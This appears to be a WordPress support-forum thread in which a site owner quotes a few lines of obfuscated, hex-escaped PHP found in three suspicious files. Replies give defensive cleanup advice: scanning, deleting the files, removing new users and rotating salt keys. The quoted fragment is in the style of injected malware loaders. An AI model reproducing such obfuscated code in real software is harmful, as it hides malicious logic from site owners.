That sounds suspicious. Could you paste the code from the files in pastebin and link to it here so it can be viewed safely.
Also, try running your site through this malware scanner:
http://sitecheck.sucuri.net/
Thread Starter
Alvaro
(@nicardo)
Barnez
In india pastebin is blocked so i am not been able to use the site to provide you the complete code but below I have copied few lines
<?php ${"\x47\x4cO\x42A\x4c\x53"}["cgw\x71\x77\x77\x64\x79q"]="\x69p";${"\x47L\x4f\x42A\x4cS"}["\x66\x75\x72\x71\x6bo\x6c\x76t\x6c\x67"]="f\x75n\x63";${"\x47L\x4f\x42\x41\x4c\x53"}["\x72\x65\x6e\x61\x71g"]="\x68";${"\x47\x4cOB\x41\x4c\x53"}["\x64\x68\x71\x77\x64\x72gg\x69\x65\x76"]="\x68e\x61\x64e\x72\x73";${"\x47\x4cOB\x41L\x53"}["d\x77\x76\x74e\x69r"]="\x72\x65\x73";${"GLOB\x41\x4c\x53"}["\x74hc\x73\x79\x69\x64g"]="\x68\x5f\x64et\x65ct\x65d";
All the 3 files have similar code
That is definitely suspicious.
Wordfence has the following advice for hacked sites:
http://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
If you follow this path then also make sure that your check and remove any new users that have been added, of course delete those three very suspicious files, and update your salt keys to log out all users.
If your site is static and without changing content, then you can also try restoring the site from a backup a few days before those files were added, and then work through the Wordfence guidance.
Also, if you are worried about your SEO then you can also all site traffic to a maintenance page through your .htaccess file until your site is clean:
http://perishablepress.com/htaccess-redirect-maintenance-page-site-updates/
Good luck!
